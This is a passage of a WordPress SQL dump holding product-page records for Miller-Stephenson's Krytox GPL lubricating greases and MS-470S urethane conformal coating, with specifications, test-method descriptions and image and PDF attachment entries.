New bearings should be inspected for damage and cleanliness before use. The components must be completely cleaned of greases or preservative oils when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on un-cleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They could also oxidize and harden and can create debris which will contaminate the grease.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-prepare-bearings/">Prepping a bearing for Krytox is a simple process. Click here to get a step by step guide on how to prep a bearing with Krytox grease.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">To learn more about Krytox NSF H-1 Rated Food Grade Lubricants click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">To learn more about Krytox Automotive Solutions click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-noise-vibration-harshness/">To learn more about Krytox Automotive Noise, Harshness and Vibration solutions click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-faq/">For the Krytox Frequently asked questions (FAQ) click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox/">For a general Krytox application overview, click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">With help regarding which Krytox grease is right for you, click here.</a>', 'GPL 206', 'Krytox GPL 206 has a Oil Viscosity of 243 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -36°C to 260°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-206', '', '', '2017-02-07 15:59:46', '2017-02-07 15:59:46', '', 0, 'https://132.148.10.86/wordpress/product/gpl-206/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (791, 3, '2016-11-24 03:26:41', '2016-11-24 03:26:41', 'Miller-Stephenson’s MIL-Spec Urethane Conformal Coating ( MS-470S ) offers superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear.  The base resin conforms to MIL-I-46058C Type UR, IPC-CC-830B and is UL 94 V-0 listed. The coating is recognized under UL file number E105698. MS-470S has the following benefits:\n<ul>\n 	<li>Superior toughness and abrasion resistance</li>\n 	<li>Reworkable and room temperature cure</li>\n 	<li>Solvent and discoloration resistant</li>\n 	<li>Fluorescent under UV light</li>\n 	<li>MIL-I-46058C Type UR, IPC-CC-830B, UL 94 V-0</li>\n</ul>\nPolyurethane coatings are available as either aerosol or bulk formulations. Both formulations provide excellent humidity resistance and far greater chemical resistance than Acrylic coatings. Single component Polyurethanes, while easy to apply, enjoy long pot life but sometimes require very lengthy cure cycles to achieve full or optimum cure. The cure cycle can be accelerated by the application of heat typically reducing cure times to less than 4-5 hours at 50% humidity.\n\nCleanliness of the substrate is of extreme importance for the successful application of a conformal coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures. MS-470s will cover 8.6 square feet at a 2-mil thickness per 14-oz. aerosol can. Printed circuit boards or electronics covered with urethane coating are repairable, simply heat the coating with a soldering iron to remove the components.\n\n<span style="font-size: 11.0pt; font-family: \'Helvetica\',sans-serif; color: #555555;">MIL-Spec Urethane Conformal Coating provide a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion.  Some typical application examples include high-reliability defense, automotive and aerospace, where coatings are used to protect against various combinations of moisture, aggressive chemicals and vapors, salt sprays, large temperature variations, mechanical vibration, and even organic attack (e.g. fungus). The protective nature of conformal coatings also means that they not only protect, but also serve to enhance product reliability and thereby reduce the potential cost and damaging effects of early field failures.</span>\n\n<a href="https://www.miller-stephenson.com/conformal-coating/">For help in choosing the correct conformal coating for your application see our article section</a>\n\nMore than a world-class materials supplier, Miller-Stephenson is an expert and dedicated collaborator. If our product finder cannot identify an off-the-shelf solution that meets your precise specifications or if you are looking for application expertise and support please <a href="https://www.miller-stephenson.com/tech-support/">contact us</a>.', 'MS-470S', 'Miller-Stephenson’s Urethane Conformal Coating offers superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Urethane resins are very hard and resistant to mechanical wear.  The base resin conforms to MIL-I-46058C Type UR, IPC-CC-830B and is UL 94 V-0 listed. The coating is recognized under UL file number E105698. MS-470S has the following benefits:\n<ul>\n 	<li>Superior toughness and abrasion resistance</li>\n 	<li>Reworkable and room temperature cure</li>\n 	<li>Solvent and discoloration resistant</li>\n 	<li>Fluorescent under UV light</li>\n 	<li>MIL-I-46058C Type UR, IPC-CC-830B, UL 94 V-0</li>\n</ul>', 'inherit', 'closed', 'closed', '', '190-autosave-v1', '', '', '2016-11-24 03:26:41', '2016-11-24 03:26:41', '', 190, 'https://132.148.10.86/wordpress/190-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (792, 2, '2016-08-24 16:56:27', '2016-08-24 16:56:27', '', 'Krytox GPL 221', '', 'inherit', 'open', 'closed', '', 'shutterstock_147750545', '', '', '2016-09-27 19:51:56', '2016-09-27 19:51:56', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_147750545.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (793, 2, '2016-08-24 16:57:14', '2016-08-24 16:57:14', '', 'Krytox GPL 207', '', 'inherit', 'open', 'closed', '', 'shutterstock_230407642', '', '', '2016-10-04 13:41:52', '2016-10-04 13:41:52', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_230407642.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (794, 2, '2016-08-24 16:57:26', '2016-08-24 16:57:26', '', 'Krytox  GPL 211', '', 'inherit', 'open', 'closed', '', 'shutterstock_283795469', '', '', '2016-09-27 15:58:08', '2016-09-27 15:58:08', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_283795469.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (795, 2, '2016-08-24 16:57:41', '2016-08-24 16:57:41', '', 'Krytox GPL 210', '', 'inherit', 'open', 'closed', '', 'shutterstock_389250415', '', '', '2016-09-27 15:43:46', '2016-09-27 15:43:46', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_389250415.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (796, 2, '2016-08-24 16:57:54', '2016-08-24 16:57:54', '', 'Krytox  GPL 206', '', 'inherit', 'open', 'closed', '', 'shutterstock_448241593', '', '', '2016-09-27 15:53:38', '2016-09-27 15:53:38', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_448241593.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (797, 2, '2016-08-24 17:23:52', '2016-08-24 17:23:52', '', '240', '', 'inherit', 'open', 'closed', '', '240', '', '', '2016-08-24 17:23:52', '2016-08-24 17:23:52', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/240.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (798, 2, '2016-08-24 17:23:53', '2016-08-24 17:23:53', '', '283', '', 'inherit', 'open', 'closed', '', '283', '', '', '2016-08-24 17:23:53', '2016-08-24 17:23:53', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/283.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (799, 2, '2016-08-24 17:23:54', '2016-08-24 17:23:54', '', 'AUT2A45', '', 'inherit', 'open', 'closed', '', 'aut2a45', '', '', '2016-08-24 17:23:54', '2016-08-24 17:23:54', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/AUT2A45.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (800, 2, '2016-08-24 17:23:55', '2016-08-24 17:23:55', '', 'AUT2045', '', 'inherit', 'open', 'closed', '', 'aut2045', '', '', '2016-08-24 17:23:55', '2016-08-24 17:23:55', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/AUT2045.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (801, 2, '2016-08-24 17:23:56', '2016-08-24 17:23:56', '', 'AUT2245', '', 'inherit', 'open', 'closed', '', 'aut2245', '', '', '2016-08-24 17:23:56', '2016-08-24 17:23:56', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/AUT2245.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (802, 2, '2016-08-24 17:23:57', '2016-08-24 17:23:57', '', 'FPG', '', 'inherit', 'open', 'closed', '', 'fpg', '', '', '2016-08-24 17:23:57', '2016-08-24 17:23:57', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/FPG.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (803, 2, '2016-08-24 17:23:58', '2016-08-24 17:23:58', '', 'GPL10X', '', 'inherit', 'open', 'closed', '', 'gpl10x', '', '', '2016-08-24 17:23:58', '2016-08-24 17:23:58', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/GPL10X.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (804, 2, '2016-08-24 17:23:59', '2016-08-24 17:23:59', '', 'GPL20X', '', 'inherit', 'open', 'closed', '', 'gpl20x', '', '', '2016-08-24 17:23:59', '2016-08-24 17:23:59', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/GPL20X.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (805, 2, '2016-08-24 17:24:00', '2016-08-24 17:24:00', '', 'GPL21X', '', 'inherit', 'open', 'closed', '', 'gpl21x', '', '', '2016-08-24 17:24:00', '2016-08-24 17:24:00', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/GPL21X.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (806, 2, '2016-08-24 17:24:02', '2016-08-24 17:24:02', '', 'GPL22X', '', 'inherit', 'open', 'closed', '', 'gpl22x', '', '', '2016-08-24 17:24:02', '2016-08-24 17:24:02', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/GPL22X.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (807, 2, '2016-08-24 17:24:04', '2016-08-24 17:24:04', '', 'Krytox250', '', 'inherit', 'open', 'closed', '', 'krytox250', '', '', '2016-08-24 17:24:04', '2016-08-24 17:24:04', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Krytox250.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (808, 2, '2016-08-24 17:24:05', '2016-08-24 17:24:05', '', 'Krytox280', '', 'inherit', 'open', 'closed', '', 'krytox280', '', '', '2016-08-24 17:24:05', '2016-08-24 17:24:05', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Krytox280.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (809, 2, '2016-08-24 17:24:07', '2016-08-24 17:24:07', '', 'LVP', '', 'inherit', 'open', 'closed', '', 'lvp', '', '', '2016-08-24 17:24:07', '2016-08-24 17:24:07', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/LVP.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (810, 2, '2016-08-24 17:24:09', '2016-08-24 17:24:09', '', 'VPF', '', 'inherit', 'open', 'closed', '', 'vpf', '', '', '2016-08-24 17:24:09', '2016-08-24 17:24:09', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VPF.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (811, 2, '2016-08-24 17:24:11', '2016-08-24 17:24:11', '', 'XHTAC', '', 'inherit', 'open', 'closed', '', 'xhtac', '', '', '2016-08-24 17:24:11', '2016-08-24 17:24:11', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/XHTAC.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (812, 2, '2016-08-24 17:24:12', '2016-08-24 17:24:12', '', 'XHTBD', '', 'inherit', 'open', 'closed', '', 'xhtbd', '', '', '2016-08-24 17:24:12', '2016-08-24 17:24:12', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/XHTBD.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (813, 2, '2016-08-24 17:24:15', '2016-08-24 17:24:15', '', 'XHTS', '', 'inherit', 'open', 'closed', '', 'xhts', '', '', '2016-08-24 17:24:15', '2016-08-24 17:24:15', '', 790, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/XHTS.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (814, 2, '2016-08-24 17:27:36', '2016-08-24 17:27:36', 'Krytox GPL 207 grease is the product of choice in extreme temperature conditions. Most petroleum products begin to degrade above 99 °C (210 °F) and are too viscous at temperatures just below –18 °C (0 °F). Under the D-3336 test conditions of 177 °C (350 °F) and 10,000 rpm, the majority of competing hydrocarbon lubricants fail in less than 1,000 hr. But, the general purpose line of Krytox lubricants has been shown to last over 5,000 hr without failure, even at an increased temperature of 200 °C (392 °F). This extreme condition performance is what distinguishes Krytox performance lubricants from other competing products.\r\n\r\nKrytox GPL 207 grease is cost-effective across a wide range of applications. Due to their inert nature, Krytox lubricants provide a much longer usable life as compared to typical hydrocarbon oils and greases; and the longer usable life allows them to remain for considerable periods of time before needing to be replaced, if they are replaced at all. That translates to savings over time, both by lowering the amount of lubricant purchased and any downtime incurred during re-lubrication.\r\n\r\nStandard Krytox lubricants contain only carbon, oxygen, and fluorine; whereas, hydrocarbons contain hydrogen. The absence of hydrogen greatly increases the stability of the lubricants and renders them nonflammable with no flash point. They will not burn or support combustion, even in an environment of 100% liquid or gaseous oxygen.\r\n\r\nKrytox performance lubricants are not only resistant to oxygen, but they are also inert to virtually all chemicals used in a variety of industries. They are insoluble in most solvents, but are soluble in highly fluorinated fluids and some super critical fluids, such as CO2.\r\n\r\nAt elevated temperatures and pressures, PFPE oils are highly resistant to attack by gaseous and liquid oxygen. As a result, Krytox oils and greases have become preferred lubricants in the oxygen manufacturing industry and in those industries that use oxygen.\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-prepare-bearings/">Prepping a bearing for Krytox is a simple process. Click here to get a step by step guide on how to prep a bearing with Krytox grease.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">To learn more about Krytox NSF H-1 Rated Food Grade Lubricants click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">To learn more about Krytox Automotive Solutions click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-noise-vibration-harshness/">To learn more about Krytox Automotive Noise, Harshness and Vibration solutions click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-faq/">For the Krytox Frequently asked questions (FAQ) click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox/">For a general Krytox application overview, click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-product-selection-guide/">With help regarding which Krytox grease is right for you, click here.</a>', 'GPL 207', 'Krytox GPL 207 has a Oil Viscosity of 450 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -30°C to 288°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-207', '', '', '2016-10-12 18:38:46', '2016-10-12 18:38:46', '', 0, 'https://132.148.10.86/wordpress/product/gpl-207/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (818, 2, '2016-08-25 15:06:19', '2016-08-25 15:06:19', 'Krytox GPL 211 heavy-duty grease is used for high loading or slow speeds. EP greases have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions. In addition to the EP additive in Krytox GPL 211 heavy-duty grease, Krytox oil provides adequate EP protection as an oil by itself, due to the viscosity build under load and its unique tribochemistry. \r\n\r\nA common test for analyzing EP performance is the Timken EP method, ASTM D2509. The test is performed by applying pressure between a rotating steel cup and a steel block and simulates line contact conditions. Two conditions are observed; the OK Load is the highest load at which no seizing or welding occurs, and it also reflects the load-carrying capability of the lubricant. The\r\nScore Load is the lowest load at which seizing or welding is observed. The scar width, which is the average scar width at the load corresponding to the OK load valve, is also recorded. \r\n\r\nAnother common test for analyzing EP performance is the Four Ball EP, ASTM D2596. The test is performed by steadily increasing the load on a rotating steel ball in contact with three fixed balls until they seize and welding occurs, which simulates point contact conditions. The lowest load at which this welding occurs is called the Weld Point. From this data, the load wear index (LWI) is calculated, which is a value that relates how well the grease prevents wear when operating below the weld point. For many competing greases, the LWI can generally fall between 50 and 100. Krytox greases typically have an LWI well above 100. This further shows how in addition to extreme condition performance, Krytox™ can also outperform most competitive greases in extreme pressure performance\r\n\r\nOne of the greatest advantages of using Krytox lubricants is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n', 'GPL 211', 'Krytox GPL 211 has a Oil Viscosity of 7.8 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -70°C to 104°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-211', '', '', '2016-10-04 13:59:50', '2016-10-04 13:59:50', '', 0, 'https://132.148.10.86/wordpress/product/gpl-211/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (819, 2, '2016-08-25 15:11:01', '2016-08-25 15:11:01', 'Krytox GPL 212 heavy-duty grease is used for high loading or slow speeds. EP greases have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions. In addition to the EP additive in Krytox GPL 212 heavy-duty grease, Krytox oil provides adequate EP protection as an oil by itself, due to the viscosity build under load and its unique tribochemistry. \r\n\r\nA common test for analyzing EP performance is the Timken EP method, ASTM D2509. The test is performed by applying pressure between a rotating steel cup and a steel block and simulates line contact conditions. Two conditions are observed; the OK Load is the highest load at which no seizing or welding occurs, and it also reflects the load-carrying capability of the lubricant. The\r\nScore Load is the lowest load at which seizing or welding is observed. The scar width, which is the average scar width at the load corresponding to the OK load valve, is also recorded. \r\n\r\nAnother common test for analyzing EP performance is the Four Ball EP, ASTM D2596. The test is performed by steadily increasing the load on a rotating steel ball in contact with three fixed balls until they seize and welding occurs, which simulates point contact conditions. The lowest load at which this welding occurs is called the Weld Point. From this data, the load wear index (LWI) is calculated, which is a value that relates how well the grease prevents wear when operating below the weld point. For many competing greases, the LWI can generally fall between 50 and 100. Krytox greases typically have an LWI well above 100. This further shows how in addition to extreme condition performance, Krytox™ can also outperform most competitive greases in extreme pressure performance\r\n\r\nOne of the greatest advantages of using Krytox lubricants is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n', 'GPL 212', 'Krytox GPL 202 has a Oil Viscosity of 15 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -63°C to 132°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-212', '', '', '2016-10-04 14:00:34', '2016-10-04 14:00:34', '', 0, 'https://132.148.10.86/wordpress/product/gpl-212/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (821, 2, '2016-08-25 15:11:55', '2016-08-25 15:11:55', 'Krytox GPL 214 heavy-duty grease is used for high loading or slow speeds. EP greases have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions. In addition to the EP additive in Krytox GPL 214 heavy-duty grease, Krytox oil provides adequate EP protection as an oil by itself, due to the viscosity build under load and its unique tribochemistry. \r\n\r\nA common test for analyzing EP performance is the Timken EP method, ASTM D2509. The test is performed by applying pressure between a rotating steel cup and a steel block and simulates line contact conditions. Two conditions are observed; the OK Load is the highest load at which no seizing or welding occurs, and it also reflects the load-carrying capability of the lubricant. The\r\nScore Load is the lowest load at which seizing or welding is observed. The scar width, which is the average scar width at the load corresponding to the OK load valve, is also recorded. \r\n\r\nAnother common test for analyzing EP performance is the Four Ball EP, ASTM D2596. The test is performed by steadily increasing the load on a rotating steel ball in contact with three fixed balls until they seize and welding occurs, which simulates point contact conditions. The lowest load at which this welding occurs is called the Weld Point. From this data, the load wear index (LWI) is calculated, which is a value that relates how well the grease prevents wear when operating below the weld point. For many competing greases, the LWI can generally fall between 50 and 100. Krytox greases typically have an LWI well above 100. This further shows how in addition to extreme condition performance, Krytox™ can also outperform most competitive greases in extreme pressure performance\r\n\r\nOne of the greatest advantages of using Krytox lubricants is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n', 'GPL 214', 'Krytox GPL 214 has a Oil Viscosity of 60 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -51°C to 179°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-214', '', '', '2016-10-04 14:04:09', '2016-10-04 14:04:09', '', 0, 'https://132.148.10.86/wordpress/product/gpl-214/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (822, 2, '2016-08-25 15:12:45', '2016-08-25 15:12:45', 'Krytox GPL 215 heavy-duty grease is used for high loading or slow speeds. EP greases have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions. In addition to the EP additive in Krytox GPL 215 heavy-duty grease, Krytox oil provides adequate EP protection as an oil by itself, due to the viscosity build under load and its unique tribochemistry. \r\n\r\nA common test for analyzing EP performance is the Timken EP method, ASTM D2509. The test is performed by applying pressure between a rotating steel cup and a steel block and simulates line contact conditions. Two conditions are observed; the OK Load is the highest load at which no seizing or welding occurs, and it also reflects the load-carrying capability of the lubricant. The\r\nScore Load is the lowest load at which seizing or welding is observed. The scar width, which is the average scar width at the load corresponding to the OK load valve, is also recorded. \r\n\r\nAnother common test for analyzing EP performance is the Four Ball EP, ASTM D2596. The test is performed by steadily increasing the load on a rotating steel ball in contact with three fixed balls until they seize and welding occurs, which simulates point contact conditions. The lowest load at which this welding occurs is called the Weld Point. From this data, the load wear index (LWI) is calculated, which is a value that relates how well the grease prevents wear when operating below the weld point. For many competing greases, the LWI can generally fall between 50 and 100. Krytox greases typically have an LWI well above 100. This further shows how in addition to extreme condition performance, Krytox™ can also outperform most competitive greases in extreme pressure performance\r\n\r\nOne of the greatest advantages of using Krytox lubricants is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n', 'GPL 215', 'Krytox GPL 215 has a Oil Viscosity of 160 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -36°C to 204°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-215', '', '', '2016-10-04 14:05:34', '2016-10-04 14:05:34', '', 0, 'https://132.148.10.86/wordpress/product/gpl-215/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (823, 2, '2016-08-25 15:13:09', '2016-08-25 15:13:09', 'Krytox GPL 216 heavy-duty grease is used for high loading or slow speeds. EP greases have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions. In addition to the EP additive in Krytox GPL 216 heavy-duty grease, Krytox oil provides adequate EP protection as an oil by itself, due to the viscosity build under load and its unique tribochemistry. \r\n\r\nA common test for analyzing EP performance is the Timken EP method, ASTM D2509. The test is performed by applying pressure between a rotating steel cup and a steel block and simulates line contact conditions. Two conditions are observed; the OK Load is the highest load at which no seizing or welding occurs, and it also reflects the load-carrying capability of the lubricant. The\r\nScore Load is the lowest load at which seizing or welding is observed. The scar width, which is the average scar width at the load corresponding to the OK load valve, is also recorded. \r\n\r\nAnother common test for analyzing EP performance is the Four Ball EP, ASTM D2596. The test is performed by steadily increasing the load on a rotating steel ball in contact with three fixed balls until they seize and welding occurs, which simulates point contact conditions. The lowest load at which this welding occurs is called the Weld Point. From this data, the load wear index (LWI) is calculated, which is a value that relates how well the grease prevents wear when operating below the weld point. For many competing greases, the LWI can generally fall between 50 and 100. Krytox greases typically have an LWI well above 100. This further shows how in addition to extreme condition performance, Krytox™ can also outperform most competitive greases in extreme pressure performance\r\n\r\nOne of the greatest advantages of using Krytox lubricants is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n', 'GPL 216', 'Krytox GPL 216 has a Oil Viscosity of 243 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -36°C to 260°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-216', '', '', '2016-10-04 14:06:22', '2016-10-04 14:06:22', '', 0, 'https://132.148.10.86/wordpress/product/gpl-216/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (824, 2, '2016-08-25 15:15:05', '2016-08-25 15:15:05', 'Krytox GPL 217 heavy-duty grease is used for high loading or slow speeds. EP greases have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions. In addition to the EP additive in Krytox GPL 217 heavy-duty grease, Krytox oil provides adequate EP protection as an oil by itself, due to the viscosity build under load and its unique tribochemistry. \r\n\r\nA common test for analyzing EP performance is the Timken EP method, ASTM D2509. The test is performed by applying pressure between a rotating steel cup and a steel block and simulates line contact conditions. Two conditions are observed; the OK Load is the highest load at which no seizing or welding occurs, and it also reflects the load-carrying capability of the lubricant. The\r\nScore Load is the lowest load at which seizing or welding is observed. The scar width, which is the average scar width at the load corresponding to the OK load valve, is also recorded. \r\n\r\nAnother common test for analyzing EP performance is the Four Ball EP, ASTM D2596. The test is performed by steadily increasing the load on a rotating steel ball in contact with three fixed balls until they seize and welding occurs, which simulates point contact conditions. The lowest load at which this welding occurs is called the Weld Point. From this data, the load wear index (LWI) is calculated, which is a value that relates how well the grease prevents wear when operating below the weld point. For many competing greases, the LWI can generally fall between 50 and 100. Krytox greases typically have an LWI well above 100. This further shows how in addition to extreme condition performance, Krytox™ can also outperform most competitive greases in extreme pressure performance\r\n\r\nOne of the greatest advantages of using Krytox lubricants is stability in a wide variety of operating conditions and environments. This inert nature is what allows Krytox oils and greases to outlast and outperform competing hydrocarbon products.\r\n', 'GPL 217', 'Krytox GPL 217 has a Oil Viscosity of 450 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -30°C to 288°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-217', '', '', '2016-10-04 14:11:48', '2016-10-04 14:11:48', '', 0, 'https://132.148.10.86/wordpress/product/gpl-217/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (825, 2, '2016-08-25 15:30:53', '2016-08-25 15:30:53', '', 'shutterstock_83011513', '', 'inherit', 'open', 'closed', '', 'shutterstock_83011513', '', '', '2016-08-25 15:30:53', '2016-08-25 15:30:53', '', 819, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_83011513.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (826, 2, '2016-08-25 15:31:02', '2016-08-25 15:31:02', '', 'Krytox GPL 212', '', 'inherit', 'open', 'closed', '', 'shutterstock_93134335', '', '', '2016-09-27 16:39:54', '2016-09-27 16:39:54', '', 819, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_93134335.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (827, 2, '2016-08-25 15:31:10', '2016-08-25 15:31:10', '', 'Krytox GPL 224', '', 'inherit', 'open', 'closed', '', 'shutterstock_95239273', '', '', '2016-09-27 20:00:41', '2016-09-27 20:00:41', '', 819, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_95239273.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (829, 2, '2016-08-25 15:31:33', '2016-08-25 15:31:33', '', 'Krytox GPL 217', '', 'inherit', 'open', 'closed', '', 'shutterstock_149749874', '', '', '2016-09-27 19:28:43', '2016-09-27 19:28:43', '', 819, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_149749874.jpg', 0, 'attachment', 'image/jpeg', 0); 
